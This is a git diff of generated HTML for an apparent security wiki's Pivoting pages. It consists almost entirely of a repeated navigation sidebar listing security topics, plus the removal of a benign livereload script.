        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -207,22 +207,6 @@

- - diff --git a/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html b/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html index 0ec02d44..b5f869fe 100644 --- a/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html +++ b/docs/Post Exploitation/Pivoting/Tunneling with Chisel.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -196,22 +196,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Post Exploitation/Pivoting/index.html b/docs/Post Exploitation/Pivoting/index.html index 69bfba08..15cf5bbb 100644 --- a/docs/Post Exploitation/Pivoting/index.html +++ b/docs/Post Exploitation/Pivoting/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
